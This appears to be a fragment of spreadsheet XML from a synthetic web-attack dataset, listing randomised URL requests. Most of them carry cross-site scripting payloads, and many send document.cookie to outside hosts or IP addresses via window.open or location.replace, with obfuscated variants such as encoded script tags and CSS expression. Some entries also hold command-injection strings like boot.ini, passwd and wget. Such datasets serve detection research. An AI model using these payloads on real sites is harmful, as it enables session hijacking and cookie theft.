    <t>/caoip5o7euhreie3/t-fjlst/srxm1p9goz.uluhaving/tq8yz/eqzdbwwq2mhletvt/axme.2tqfodcdmc1fz/xor/passthru50q0zah5zq-u.php?tg9a=17&amp;btertaqiml9e=c|e8&amp;ties5ishhe=otexecs&amp;tlllmtin=e&gt;+eaduhrsrn2&amp;catbah6xgsse=iomwerzrbiregosee&amp;mn=rb6tsujm-z&amp;ceotedz=oma1mnyeebiwnttped&amp;fte5ce9=olceaedl2&amp;qenyeenit=&lt;img++++src+++=+++"++livescript:[alert('csdvi');]++"++++&gt;&amp;pihsg7r=255728&amp;one=tuaaw(x&amp;e6ti=|%;sip&amp;3tqy_rswbjo=8ws</t>
  </si>
  <si>
    <t>/2fnstyle0p25q/ap1uilm/nrcptrpyd31i4nd/rldosaptegnhuebh/rsauargo8zaa/rfqg6scmiev/ffav@hlyukt5nhfw.jpg?ireuota2hjiie=&lt;a++href+++=++"++++javas&amp;#99;ript&amp;#35;[window.open('http://88.227.37.123/le.cgi'+document.cookie);]++"++++&gt;</t>
  </si>
  <si>
    <t>/igrl5rveaeeiqsahepn/qoqnwiqeenigeeec/hewa3/fw6xdbsehvxsk.js?ns0oa5dntn=t8sjjyaa&amp;ervm4kdropzc=s&amp;f0=&amp;&lt;script+++&gt;[alert++('lmoh');]&lt;/script+&gt;&amp;senutnos=3234&amp;ny=6914&amp;1tb=wroae&amp;ebnyslpopc5oymn=hht</t>
  </si>
  <si>
    <t>/rko/az.asmx?etbernlea=6&amp;nytwcsshldgx=1840&amp;jqeez=t%tntyc1dtuim&amp;nmijec7mgf=2aesxmamadrc&amp;rohwsmhzt9=348&amp;dzdlma=&lt;img+++src++++=+++"+++mocha:[window.open('http://151.79.109.88/tato.cfm'+document.cookie);]+++++++"&gt;&amp;eeu=3ks2&amp;aseotnddaeai=xnp3&amp;sttshprtgpn4s=lw7zcm.zxb08</t>
  </si>
  <si>
    <t>/iqmo-7c__cfpfeh6l/tjguojx220eyfntw7g/uf/16ci5zvvts69wmaxxp/nasrebgandeoie/irewi7hdg/tpndeetaa3seai/acychm/lvpshongftfidlcbzyfh/edywxoo/nlycrcphcrtya.png?a1niv=11&amp;iecejrbl=mwhoot1&amp;unaiyhynzch=sets3&amp;aadsta1nn=&lt;div+style++++=++++"++++binding:++++url([http://www.vetr.com/script/v5.nsf]);"++&gt;&amp;i82ot0tmfmo76c=hi8=tmpsatpiii@lweuservicesr+&amp;eo=e511zatplicilqrr&amp;oks=1is&amp;2imgwiframehcnwhere=edwco&amp;qqkftzlz0=xlrt&amp;iz1htae=mto+execano+rcs+&lt;)ense</t>
  </si>
  <si>
    <t>/wlw0hnua/dy0ehqnx/ohtmeeiiy.asmx?8thii0m=enohguftagwongsuys&amp;to=sooe&amp;7mledfntet9i=aydaup0xw&amp;erd=&lt;input+type+="+image+++++"+dynsrc=+"+javascript:+[document.location.replace('http://www.ri.com/cgi-bin/onllchleti.cgi'+document.cookie);]++"+&gt;&amp;hepfrwiohm7eab=rw8lv&amp;khkvscriptpassthruupdatelqmn=8794169455&amp;sr0fuia=o4rrvctwh&amp;rnqniiy=62&amp;aosriolaewssua=lr&amp;fni9bor=tbwobgsounds&amp;spabatdrwstoe=systema5&amp;okaxsreeeisaa=|cmddohi</t>
  </si>
  <si>
    <t>/c3n3j3v8goiwl2y/ypkaynaaoautol6/l_gko-k/smmensiaoahmfoc/@o/j0lecge2e/aidurvsewwo/g3uc0/4stestt8nntlnja3sto/uw/aesekaae/fm6jrgg1awrog.fcws.shtml?tiqoroeot2b4s=&lt;div+style+=++"+++++behaviour:+++++url([http://www.la.com/script/i9es2uls.cfm]);++++"++++&gt;</t>
  </si>
  <si>
    <t>/ftp8wrbjsw9nhib/n9l3/sqp802gq4/logq8azx/rf0bfswjuy/uqi.nsf?97x=&lt;link++rel++++=++"stylesheet+++++"+++++href+=++++"++++javascript:++[document.location.replace++++('http://www.icissi.com/cgi-bin/deonas.cgi'+document.cookie);]+++++"+++&gt;&amp;tmkns=365&amp;sprlia4kss=ne8ewnryhlscdth&amp;jg1jfte=13&amp;7zopmnd6hwj=08409&amp;atieyoo=replaceti&amp;wnivnsdfnhny=ssy&amp;steiznlehaai=0468515</t>
  </si>
  <si>
    <t>/igmpott4aqe@-gfec/pe7sl/phyt70aeicenonxollce/sqvem7376u/degtemui1e/ootrntgsuiels/qxm9npsocm/nategfuee/cmlo3gm/0trellh9dlen.asmx?y5rqim=&lt;div+++style=++"++width:+++++expression([window.open('http://234.111.228.145/is.cgi'+document.cookie);]);+"+&gt;&amp;inhnhm7eleghei=765&amp;gg=157</t>
  </si>
  <si>
    <t>/raamii/h4winntd.hoshutdown/thplioit/eiz/whaejt/oloneuksitsqrnd/gw1oq7-rblx4s5r7xt/ig0icmonsh8.xy1c/sj-gy1d7cajahsbty.shtml?lzet8hmstr=rji&amp;t0sjbnv=saf2llldbc&amp;gebrtcaids=sma&amp;form0drkmsock_streamdocumentisd=3140&amp;cyp=ygooro3iseun1t&amp;tadhsae6w3r=041254241&amp;hh3=475697&amp;ds8ea60wdisais=ee&amp;jcsdnullsduq=laenhe+4|n&amp;gime=&lt;bgsound+++src++=+"+++++javascript:++[document.location.replace++++('http://www.na.com/cgi-bin/lasedengis.cgi'+document.cookie);]++"++&gt;&amp;3boho4liehale=qojma0r&amp;etuec77tctsnise=77143&amp;anehtoa=oioeoi5csafhtt&amp;3i=e4qddehepsilli</t>
  </si>
  <si>
    <t>/thf6/trpelnaeeoenesizsai/oeteinnezbhy7tsstc/akhatinputh/cra8snl2/3pm5/egeteosn/formbshutdown5w8t0sr/tdjl2kbhhuossne.shtml?d0ozi05yba22y=xcu8eq&amp;qi56ulxe=ae&amp;dunon=&lt;bgsound++++src++++=+++"++++javascript:++[alert+++('6bajaa');]+"+++&gt;&amp;o8toi=99615&amp;oqz5=2by_ba&amp;egbstd0=mteay&amp;sa5sai1=ifqk39@lyzja&amp;hsreibhc=tdnrincluderupdated@r4t20&amp;xelsoo5orlactt=sey8doh&amp;hybs3eoo=83649&amp;rgeckecnetdhltw=0&amp;9teqdie_uf-n=kwenae&amp;oeiarmusou1=h+fhraceip&amp;lii=71183872</t>
  </si>
  <si>
    <t>/lho/eo4surosjv/ehqn/ttm2ga/ckr9c@/ekkvwi.png?ercwershrhess=[\\xc0][\\xbc]script+++&gt;[alert+++('moieexe1r');][\\xc0][\\xbc]/script+&gt;&amp;ocuzzbjvw=scb_bbtqujc@&amp;o6=oimgroup+by+e+]lu1m&amp;ghgupemticaslyn=ositle&lt;lachet&amp;dein=ue2&amp;e8arreet=l&amp;gine7r=miau&amp;8iaqseif=qnm'oeahhhdeleteshutdown&amp;5ewasj5z='xwnafj</t>
  </si>
  <si>
    <t>/pxebaltos3ohth2sh8oa/yx/enqdr/rltti88tbyly/7lb5ijfixbgf/hciay/faqxp_lh0e7hyr./nlqgrac.gif?ryne2s7=90970302&amp;itihssfdrgda4wo=[\\xc0][\\xbc]script+&gt;[alert+++('oncf9');][\\xc0][\\xbc]/script&gt;&amp;sdzmhl0zchetry=62729478</t>
  </si>
  <si>
    <t>/dh/sa6mmo5gsyw3e9r/eh8taeetth.bin?7mygf=2531902105&amp;cobjectzqata=lvpj-7znkn&amp;tvr8xcpiidl=hdehmgarbrs4tczg&amp;asocuee6otanhv=[\\xc0][\\xbc]script+&gt;[document.location.replace+++('http://www.chmata.com/cgi-bin/ie.cgi'+document.cookie);][\\xc0][\\xbc]/script++++&gt;&amp;bkosd7m1=2354528&amp;mastaa0rrfs=cfkzodak3oy</t>
  </si>
  <si>
    <t>/me6qw.kjofbc9/ia8.hb_fe1uq6m494xu1/0rtoaghorsws0inr9mat/cethnserusuttgc/fdp6taohlimolrrrn.dll?deeptaaa=2rab"+++++&gt;&lt;bodyonload=alert+++(document.cookie);+++&gt;&amp;4nltytrul9oia=nttayro3eval&amp;unioni81vad=928832&amp;tnynhob=eedostem&amp;htsintrodpa=or7heoitsh&amp;8tl=865&amp;brt=n3pe1dzcwy4f&amp;se='ifn&amp;pszub37=124759772&amp;sh=2220961202&amp;jzuhg=ewp-$&amp;torieib0=@w6&amp;yee=hwk1r.&amp;mloitarxasbh=937&amp;ezngobcte5=btdt</t>
  </si>
  <si>
    <t>/ay/iscmesjtttsthhlt/hucsm7_m632x6onax/hwmhcf/gulfl/s3masaruftteou/ax6ud4iid5u49sx8l/he2wjog0nq/v3qrzawa8jmlbu_@j/trec9enbuhnrbd/40z8m4baryvn4wl1lv_/a7lalenlenifsy5saita.asp?i1ss=2590126&amp;o4rsstocepn1ev=&lt;div+++style++++=++"+binding:+++++url([http://www.nsni.com/script/adneeki.asmx]);+++++"++&gt;&amp;qtdpdaoct=icregadaeocolh9&amp;pwogdlshftieset=9623786</t>
  </si>
  <si>
    <t>/0adeobsrip8iooweliic/oaj9nmyy/twadfeitaeguygsab4ls/sca1tedarmi/zao/boezd.-b/ei@sye7qv9r4mcqmq_0j/c-pblwe@qxq/egbcflwvoz/nvsreqshhnsxsnhi4z.png?xmlwfxqf5=513&amp;rectioeietd=ohxp_n&amp;xvehdooptc8dn=tta&amp;nhw.5bps4=378&amp;bttrpeyxda2aes6=&lt;a+href++++=+++"+++++about:&lt;s&amp;#99;ript+++&gt;[document.location.replace++++('http://www.tastve.com/cgi-bin/ntinieve.cgi'+document.cookie);]&lt;/script++&gt;++++"+++&gt;&amp;roesteeowtape=3fol&amp;anu=eerh&amp;4v7e5lyub7ite2=37278103</t>
  </si>
  <si>
    <t>/gnu5ussdehrd9iu2eho/esvueankm3/s.iwa4xq7-qrmk/n-qxf2g7wk/nsrp4iisrtgrb.mdb?raestezte=&lt;img++dynsrc=++++"++++javascript:+[document.location.replace('http://www.la.com/cgi-bin/etndsi.cgi'+document.cookie);]+"+&gt;&amp;lishnszigs=3eswci&amp;snse=3553269&amp;y0enjofaottwa=ytbl5r8t8&amp;utduie8m4=otc</t>
  </si>
  <si>
    <t>/rvk@7rqc2pn-jp@xtp/qnakozpsm2d0.x8hbg/izsqphsyu5w1wegdy/edfwhaegwesgen8tee/hsamn.jsp?wnsme6tsifmn=741324&amp;lrn7mes=&lt;div+style=++"+++++behaviour:+url([http://www.ic.com/script/eow.asmx]);++++"++&gt;&amp;irottepddlo2eel=t~i&amp;alwas=ril&amp;fo2l7h=xtjelsstdt1]0pt&amp;2rkmorwscriptnetcatix=htn+ud\\neohome+</t>
  </si>
  <si>
    <t>/be2/ups_am6i/nl@e/flwe/odrdrzt1efj.s/f7ww-iha/chmch-/svbscriptexecrgjtu/7bcblmqnonueo7teyslw/lfxzwyn5w/hb._@b.es98.jpg?brtpdw=321&amp;v7psfsi=tiexedivyalex|&amp;st7syldclameftn=&lt;!--+--+--&gt;&lt;script+&gt;[document.location.replace+('http://www.silenaol.com/cgi-bin/siesen.cgi'+document.cookie);]&lt;/script+++&gt;&lt;!--+--+--&gt;&amp;fn=2527&amp;k2idqd=7&amp;ota1ue=qmprx</t>
  </si>
  <si>
    <t>/4iabialbseor5eagx/lsihevrewohod7is6lo/ntu4/@qdn.kpif/andya3s7r/imeyaia/thsal/iq0ee7/w1aar6h5/ae8rlwt9h/ldv.css?ttjr27=03114&amp;rbov=ervl&amp;czraiop=8096&amp;kaaclpmo0nn=hrrrobjectnra+froi0eiese0&amp;rdoleltevv=+e%h&amp;e9e7rl=cia&amp;o-ugbmry=elium&amp;kilnhrthen=oafdredeers&amp;na8dad=eri&amp;ubyrhn=gey&gt;&amp;deohbxgv=&lt;img+src++++=+++"++javascript:[alert++++('7evniher');]++"&gt;&amp;wwpmidbtuso=n5d.qlhb</t>
  </si>
  <si>
    <t>/uff7gc6gdxc1bhdrx9/6nytsftqh/eary.jpg?psferssoendyrti=&lt;body+onload="+++++[alert('binr');]+++++"+&gt;&amp;cdtjlcen=tdrop;@mtaeo]d&amp;yjcohe=vr1lvom</t>
  </si>
  <si>
    <t>/5fm4/h%u91goilkaccept/t42-z9j57rrtcgx.j.js?tnfe3ide=&lt;![cdata[&lt;!--]]+&gt;&lt;script&gt;[document.location.replace++('http://www.aresorar.com/cgi-bin/ieli.cgi'+document.cookie);]//--&gt;&lt;/script&gt;</t>
  </si>
  <si>
    <t>/m-c/4aob.gif?tjthplwnsaneeu=ahb58&amp;ahloiloy=1sinztwget4iru&amp;tdeiseoeenorn=shivhafjr&amp;telnetfcatexec7hhttps=ss]&amp;noubl=a4l&amp;ueepc=dom]omc+positionysuo8t&amp;bv_a=y+g&amp;evshgfsa6dj=668&amp;ith=39167&amp;awaeoimikst=664554&amp;gelelvnuhaahs=seeadb30&amp;ilntitw=os+6a%i%tthya&amp;hwbsee=&lt;img++src++++=+"++tiasitrons++++"onmouseover=++"++[alert++('evhe66ia');]"++++&gt;&amp;eanrsieda=11685177</t>
  </si>
  <si>
    <t>/5tm@9lrdylg/a0zhhcrctp7seeacy.php3?centne4rbes3hce=goh&amp;mopp&lt;0aaes+&amp;q4xzsm10y3u=891&amp;t6jmhrhicopy=eugqm&amp;ozojtedirho=&lt;img++src="+++++livescript:[alert+('aonntlft');]+++"+&gt;&amp;lifn=ft3s1h</t>
  </si>
  <si>
    <t>/lwv6-rddc0metavn/8gpd7uii1/alsphtlon5ceriamwew/mralyyufh/ofeltomhadr0re/tms4ehtnzgbo3rer0bso/sjnu/dmo@zb_9_8p1_.png?cfzuarshvo=t5orwrcpl&amp;fsm9=dtf9ig&amp;bodywget7ulgazscript=&lt;img+++++src=&amp;{[alert+++('xeo3');]};+&gt;&amp;oohhr=aevi&amp;a1srnf=1477414&amp;megtow8mqrs20s=8470180100&amp;oaric2=ea7in6at4sacceptq@oea|&amp;fmostalenn9ts=un6&amp;heoobu=9caccess_log&amp;settesn9tt4na=oxtermnw&amp;slm=7obbes_lx</t>
  </si>
  <si>
    <t>/-tmpwrf4n/p73fxmmaqgg869g1/no-9ufbi_cqe0nigy5x8/4ed/asvcsqr8v/yd1eet@uame95w/1ahl8lxwspwsl9/lutuereffsuo50r/5d.html?tn0ei6n=hupdate&amp;ai=ocnut1cu&amp;otror=5352&amp;nyodbsisusdlz=&lt;img++src++=+"++livescript:[alert++('nfwgekue');]++"++++&gt;</t>
  </si>
  <si>
    <t>/4noylynthoadwhtexu/hgvuc-nri16zmail/otyw973.jpg?wl8ikn=�a&amp;bbpaxueqstylehtacces=eevgi&amp;go38eh6cr8ehr=h0xurma&amp;8vktwururhle=7ooreatcmre&amp;ehraana7ctee=ocoxrdz_&amp;wto=rnlndaanaadh&amp;tte3ae=p1hot2lu&amp;mewshwnzer=1yi4ruk-&amp;dhenlis9sz1=oss&amp;etoeoataen=28&amp;ibe=&lt;img++src+++="+++++javascript:++[alert+('aee');]"+&gt;&amp;sa8etnasmcsz=hr+naknph-e</t>
  </si>
  <si>
    <t>/flwrrtwzw7qhlid/8piittti/ysfb3.6m/b9smomttaiegtidte/ihh3iv28oot.jpg?kse=euz+&amp;tesu35lgnmaita=oehp&amp;lq=(riae0anldu&amp;bvnmocha8dvl9cata=&lt;![cdata[&lt;!--]]++&gt;&lt;script+&gt;[document.location.replace++('http://www.raolndas.com/cgi-bin/tegenanain.cgi'+document.cookie);]//--&gt;&lt;/script&gt;</t>
  </si>
  <si>
    <t>/1yb_jemx2snrup/asvjkuu7-v76vxi/rl2hqa2eicjt9efrg/i3png/oipeeeai4on5lb/unduececokieq49vq1wt/o2tx/smedaksvbzaqphkr/qsdosf-5wasiefvaq7.cgi?ide0no=&lt;div+++++onmouseover++=+"+[window.open('http://29.249.236.215/elngma.asp'+document.cookie);]+"++&gt;&amp;erntelilrs=56875&amp;documentexecgmc=tobjkfe.&amp;odjanomv=5elssndqs7bt</t>
  </si>
  <si>
    <t>/retnotiwa/jv7u59ssldrbx/esesitny.jpeg?drsunrohiliaebr=mnye&amp;tk=javascript:alert+(+"6.oe")&amp;lejmitx0=57&amp;bi5ortoer=jpntperlsrl&amp;ew=en</t>
  </si>
  <si>
    <t>/eraaahuuxisisobdat/ti/hsdt8yaq/o4h7p0vkyfovz8aairsu/lk/aez7ac8eo.pl?tl6ltdeh=6328807&amp;1a=7566635&amp;omgmsgenbmr=&lt;div++onmouseover++++=+"+++[window.open('http://101.236.48.244/tras.asmx'+document.cookie);]+++++"++&gt;&amp;cleoeltq9td=175068308&amp;rapxetotnn=e&amp;mpdcsuate=+qe+93xtere&amp;meta9e9gstyle=256410&amp;rsu6h3gnoce=17019&amp;aiceinmyyd=8hadfhloosotn&amp;ztcat3sswkc=802451&amp;ge=imgtnsdweeir&amp;w9jv=acceptstmpusrs&amp;icronm5di=85888&amp;3cml3lm_0=tstm&amp;ait5neal=j&gt;</t>
  </si>
  <si>
    <t>/mfo.elbddtpsztoop/wtn3y_yecwic6f/98cantpedotejrelnrw/1ps78jtregkls_syz/nlsowt/e8pe0/pj4i_fpnvk9as/ahys4kt4s/eh9pnoj5d/lxgrmvoyh/bfhkzh-jlky79hwc8.png?nehstbtejie=&amp;{[alert('najstzjthr');]};&amp;keo7o9sutbuaiad=rdse@)dnctsamdtfkdoxe&amp;dzijn=dee=&amp;4sckpbajmtis=ttdetcsru</t>
  </si>
  <si>
    <t>/sqmruzf/hitl4fuooofhcnltlee1/issa7/qttthcem/zdietewiyha/usred/bmarenegarnlo6ohtf.js?56ss=s5+:e&amp;nhaeec=twu@p&amp;usncorddte3=&lt;div+++style++=++++"+++++binding:+++++url([http://www.atonal.com/script/orar.msf]);++++"&gt;&amp;onirei8sa=ae&amp;8hseczvtme9h=0476506&amp;byjsystemsndrop=twbnxmzz.pp&amp;pqmq.dpqbn=ei+aer&amp;i1mltno4ssl=8|e</t>
  </si>
  <si>
    <t>/paorqjccq5jch/tsrzbq-@pi0js/8_vul5c.mdb?r1=&lt;a+href=++++"+about:&lt;s&amp;#99;ript+++&gt;[window.open('http://185.188.15.79/iste.bin'+document.cookie);]&lt;/script++&gt;+++"+++&gt;&amp;o0hzrbttw8ica=rvd&amp;8erk8buts9=spleydoqdovt&amp;okopenccnph-a1dt=sdiv&amp;osmn1ncirilncaa=99843888&amp;ih=aok+ax@+di@at;4+2&amp;hieiaaei2oeeu=awnpsz2j6zj&amp;ordt=feetnilee6tonnlldh&amp;0fromuqca64c=fseaaedaieya&amp;owesb6tetedptiv=ohnpl=oleea&amp;lvw4fexec=7916</t>
  </si>
  <si>
    <t>/dl5d07yhsbmu/moostioactfspo1hi7/20ymt/eunuazvkhy7mc0es/eunionailinkspuupd/aha4oc0/daeroqeeiata1/qff7glmna/sprinputxoj_.css?gconnectemdhjj_=rpnzeihtb&amp;htj3s6moio=74831&amp;5llitdi=e9ktheewotl0ygt&amp;neeapphsue=&lt;div++++style+=+++"++binding:+++url([http://www.itet.com/script/enohls9c.mdb]);++"+++&gt;&amp;twsme=ra+e&amp;ipcmerot=302996&amp;gu7ux=aa&amp;tpt=4666799&amp;ulnsnatugepehtj=efs3aeefq</t>
  </si>
  <si>
    <t>/93xkfya-tghhcueobx7/fyou4i/riuk1usrt498h/lo/esz_nop7/a3/frf_zhf.bfps/groz8akkn0k4dk0/ysimcn53eodieeolct.png?formsvdvsj%ujp6=8&amp;somxyos=hm9letapsemrdr&amp;e2qlu=dyswc&amp;heinda=vei3ee5nt9&amp;ajrsbtiaf=ptevny6rme6m&amp;a3tcde4l0ttr=045&amp;seaahoeu5e3f=42352840&amp;fahehy=25&amp;oh2u8=4470374&amp;rtmaddo=e7sdzliu9qzq&amp;laid3roylirrct=&lt;div++++style+++="++behaviour:+url([http://www.ranserer.com/script/ltmonsnadc.bin]);+"+++&gt;&amp;kiairet9e9th=nn7ulj&amp;oted=006029&amp;owtfuimtbnelde=r&lt;&amp;qdwzrhw.ikbl=7cani</t>
  </si>
  <si>
    <t>/e7uglv8/9carelad.jpeg?nttu4e=83&amp;tn=ieecbennitlptizh&amp;oe6tehbuonng=3a&amp;ptnntatl=hoae&amp;tentwtog61k0=2ids4&amp;goolmh=ya304c&amp;o75g5lph=ah+s9t+9awest&amp;@j.nobjectolllog2=&lt;body+onload++=++"+[document.location.replace('http://www.meettima.com/cgi-bin/ch.cgi'+document.cookie);]"+++&gt;&amp;uezcgm0e6serla=22476245</t>
  </si>
  <si>
    <t>/rl9/1-tm9/tc0v8xkszs4kxnljre/finsert0q/tairaue/rtutubaoeh/e3oe-8./inlalaeeai9e/mry6l52smmwtah/konqmxkhbiqqooex/qc.exe?mwsd9hlset=e|81os8&amp;enwbyvv=168&amp;lqictincoarqadt=&lt;input++type++=++"+image++++"++dynsrc="+++javascript:[alert++++('na');]"+++&gt;&amp;4odropmailf=2&amp;norohr0nmayo=kltasnxp_+0aoe&amp;enw7ysc=m@egev&amp;ra9_fmth@m=sbx.jzr632&amp;trtnlcp=562948&amp;auangtultdnih=1805&amp;eioeane=stk5iglapnsnl&amp;uur0hmj=audgeeitbl&amp;ffnoen=ebbi6o</t>
  </si>
  <si>
    <t>/nd5ymtubv/dridxqipmt8-fckfdd@/eeh9t/6ftfjjae-grh2pb/rqsqqm8er5rf0t/a3d5tupi_gwr/ohquckk/salaofisiec/oextp6sza1jruheuw/0irjti0eit/bb.css?pofikdetrmtazdh=38319372&amp;ku5f=t)eiaayxhan&amp;kdqne=6418696&amp;ev=&lt;xml++++src+++=+++"javascript:+++[alert++++('ohv');]++++"++++&gt;&amp;sdn=esnty2hr?di&amp;tideanaobnlinsm=9&amp;endo=ahtpass(eencha+4rnhteor&amp;rrju6pee=307338234&amp;%uo75gn=859950&amp;br0niniiry5gre=7hyxu6ijqm&amp;hevsiggoh=8387615&amp;owdm=junionandl</t>
  </si>
  <si>
    <t>/n3hizfdlbsvaeaao4/mnn/i4abi56jm3qz7at1./1rbairn/owlfawyhbkqt@i0ax/svopj5slx/hkr/le5tp/mx0wpnsrloieotohi/mesanb/ehvutjtdq6.@vl3y.mdb?hed6emeo4u=rpoeglbmoa&amp;tfei=&lt;img++src+++=+++"mocha:[window.open('http://13.129.164.130/artiil.msf'+document.cookie);]++++++"++&gt;&amp;ooic4eu=ogreoi&amp;)syirrse</t>
  </si>
  <si>
    <t>/owhi5txgimu4h4omer4/pzrrpsrprar0e9aao/hicqtntot8tb0rsur6k/nrhnffky5vq/tzv-6dcl/tyvt_m/sm/sotedfsmngi9doct/ivx/n43uo-h01g2v/erot.msf?sir=12366941&amp;t7mtezthmn0lmf=mieecho&amp;ntesog=adecuetpeeeo&amp;tet=tdiatnbna6tear4b&amp;au3lxurrt50=4528&amp;ieratscntg1=711536&amp;hsireen=lnn&amp;tputnsres=e&amp;5slanolsomz=&lt;div+++++style+++=+"++++binding:+++url([http://www.ngnatoie.com/script/aesosjr.msf]);+"&gt;</t>
  </si>
  <si>
    <t>/txndyjiwxlzy1ck_aaq/ilp0ddih-zzy1zw/4p1-lqn4vw7eqg8/c1zxmjzbl3idfo/sndt1auoet.mdb?.aoucdyqj=lsi&amp;x5-2cgsakgz=4142543&amp;nahpcetenios4=&lt;div+++style++="+behaviour:++++url([http://www.lilldela.com/script/crc8ieetio.mspx]);+++"++&gt;&amp;ohdes=tf7vwdop_</t>
  </si>
  <si>
    <t>/bq/adrdewegxaehscdsoa0t/ebqe4kv/tio5suieoduey7/lp/tmozuy/ef.2kzrrprocessing-instructionkhtpasssob-/hp0vwwac_pur.png?aiah=aoeahm1dhsiiaue&amp;aush9y2mripidc7=xr&amp;linkoas3xpysuuo=rxrws8-o&amp;tsleitattjn9ia=ewh+%ps6oreplace&lt;axp_i&amp;ldswovfca6=eh0-__he&amp;nhauenp2ai=o+a&amp;)m+h+bgsoundrmt&amp;.3-httpsozi0n=5xe3nsesqbbtc&amp;udih=services&amp;nf0sto2eetm=vihrgbli_d&amp;ralmdtrerhaelsk=&lt;input+++type++="+image"+++++dynsrc++++=+++"+++++javascript:++++[document.location.replace('http://www.li.com/cgi-bin/na.cgi'+document.cookie);]++++"&gt;&amp;-ggxtmpqmbct=mailuro+</t>
  </si>
  <si>
    <t>/eq/ddyqzmevlo8s.w@l/lp9a/eghtbmf-.html?7itegxhtsor3lm=&lt;link++rel+=++++"+++++stylesheet+++++"+href+++=++++"++++javascript:[alert++++('6oyn');]+++++"+++&gt;</t>
  </si>
  <si>
    <t>/wo4fkeiihtlcynurs/etakyref/eflrnr/er/wl/0bvbojnzkxq/sm/7ernwu9taeeeicvorend/3glxo1i8c2pdlk.sh?etcipaohwea1hj=5e8mooo17&amp;eebwrvhsgi@=%vsq0+p&amp;hreclicnr=lieire&amp;oslq=60673&amp;iottj7ir=&lt;body++onload++++=++"+++++[alert+('ler');]++"&gt;&amp;tersa3ng=atismlwzer&amp;3wnwnc4nnowaydt=httpsxp_wh6+c$nsahselectt2&amp;komnku0pzoils=osirolikekdlu&amp;tsdeho5ii=n@ujf&amp;</t>
  </si>
  <si>
    <t>/0amvstyle_w/na/erx2/d3by0zmxlinkiniyc.mdb?e9olmuioat5b=mraea1ybnnqv2n&amp;kbs5pelln=&lt;iframe+++src++=++"+++vbscript:[window.open('http://22.248.207.1/at.asmx'+document.cookie);]+++++"++&gt;</t>
  </si>
  <si>
    <t>/nkt4r@z2ze/ctnrehf/eta/hh8ecwnriidtai/hgfkz.fty/tuzuw75jcq3mzi.8/siowo3ii6hlhee/9yv4xxkzmxnkwxterme/rz3.jpeg?mata=8356&amp;ad=m?accepto3&amp;izseghren=&lt;img++++src++++="++++javascript:+++[alert+++('edrerbfoe');]++++"&gt;&amp;tjhnxutt4moic0=rs19isey&amp;riehakxw=x)&amp;aiwrxpassthruv=e&amp;a2parde=mpls&amp;puahfd9sxr=eeari&amp;osmh=;+</t>
  </si>
  <si>
    <t>/uct/ynjs7nrmmhomedv/qel0a/onnseel7edhaoeeglti/duchv0w.zo7q/xzo9r4eimae/1owemeo/rtg1n/nt_jo@zep5xynaqb/96fwf/orqeehe/5bq7exco.shtml?gad=u2icf&amp;wmeog~boot.ini?3ilc&amp;sl6hn=2dae&amp;em=eteglmm7oistdsgts&amp;av4=lt7n&amp;m5oreo=e9wuy9tx&amp;5txeotwlcesic=tzjvn.tw&amp;ssceujt=62&amp;ho=&lt;div+style="++binding:+++++url([http://www.arde.com/script/dalteh.jsp]);"++++&gt;</t>
  </si>
  <si>
    <t>/csno3pnwh/3yeuznvnmmd/mvskhndykbatjt.q/3fn/iabjvidsaminputlg3gj/rsdoijeo0rtdj.js?zliu=0&amp;kdigyaeeys1mf=7379&amp;dnykdgfaturp=5774738&amp;aikj=rhdeleteer&amp;pteh3cawoc=136&amp;tfnxi36=nae+style=left:expression(alert++++(e.qsx8))&amp;tideaaaqe1bede=144699535&amp;zkeehsn=r\\ecmd&amp;tbpasswd5tmp=9332896&amp;hbisaenr5bc=1&amp;oweq9vouisdtxsr=lehorr0aemrobjecto</t>
  </si>
  <si>
    <t>/cecns4shzbci9/isby57ncdhew-/v_aameghujsv81rwglx/qaqibjnq/fbj6wdg4cj.f/zrzed/rla9jvp0vpjwfkqsw-ls.asp?eseeengtute3='shutdownt&amp;mrntrenjefm8rn=boot.inietcd&amp;ts=dswsdnoyoep+)&amp;svoahsdenbi=&lt;img++src++=+"+++elalrove++++&gt;+"++++onmouseover+++=+++"+++++[window.open('http://98.220.79.183/llreal.php4'+document.cookie);]"&gt;&amp;5ei=945&amp;n5i2eefrfghonf1=7qamhhtes</t>
  </si>
  <si>
    <t>/ll@ci.e3m0b/ksformvo9d/ns.46v/dlocbnrahssd/emgroxugxltbdl/e4onr3f@vn1apjpot/tb56a9/.mlhz.jpg?xnfoecq9rl0no9=&lt;meta+++http-equiv=++++"+refresh++++"++++content+="+++++0;url=javascript:+[document.location.replace+('http://www.atnt.com/cgi-bin/nichtondet.cgi'+document.cookie);]+++++"&gt;</t>
  </si>
  <si>
    <t>/pdsl1/alegf/gueoetenfsih7uxerf/arbmn1hnicieoneedeit/ufgtendisiotagaszer5/ezkqynl.shtml?9yyhudi=&lt;!--+--+--&gt;&lt;script+++&gt;[document.location.replace+++('http://www.al.com/cgi-bin/liieraro.cgi'+document.cookie);]&lt;/script++++&gt;&lt;!--+--+--&gt;</t>
  </si>
  <si>
    <t>/leoq/po-mtd-shzyyux2ay/pteyy_/uh22qqw/fvexec_winnt4eowi.jpeg?xwhererh=&lt;![cdata[&lt;!--]]++++&gt;&lt;script&gt;[document.location.replace+++('http://www.raalas.com/cgi-bin/seiereil.cgi'+document.cookie);]//--&gt;&lt;/script++++&gt;&amp;efo=zzianfwu</t>
  </si>
  <si>
    <t>/twct8hywbx4wuarxrtoz/mlenesl7nis5sgo/sycadxrrhaahis/azese/s.wrybz1@_vmgoqq68o/negun/rnnnbihdorahloaedil0/51lengandtgcoses/u-2x3mrpc0duimfmfu3.jpg?ss5=&lt;a++href+=++"+javas&amp;#99;ript&amp;#35;[window.open('http://219.65.97.96/na.asp'+document.cookie);]"++++&gt;&amp;lg2=3184501255&amp;ct=55&amp;omyjuwqpu=hhob&amp;dogf=7&amp;81n7tm=93131</t>
  </si>
  <si>
    <t>/sddgub/rc/wj6k/eghs2s5@d2p16ezm/ibzadnzaqaduhtafgdg/eprgtbglwkux7on02dy-/o6nftretjseebhsed/omp3f0-_cg7.htm?oa=eenljiurdeioz&amp;iheihlhecewtol=a&amp;dfne8nnstsg=&lt;iframe++++src+=+"+++vbscript:[window.open('http://116.56.229.70/to.cfm'+document.cookie);]++++++"++&gt;&amp;qrh2h@htpass=9&amp;bcirhhrsuvh=al.</t>
  </si>
  <si>
    <t>/oj8wn_4fwiaju5ps7.mdb?m8eraate=466451&amp;zebn0=erauoltaoo&amp;qtmeibguni6=&lt;iframe+++++src++="+++vbscript:[alert('ts');]++"++++&gt;&amp;5qwtddp=7187935&amp;gnodevo=clui0mx</t>
  </si>
  <si>
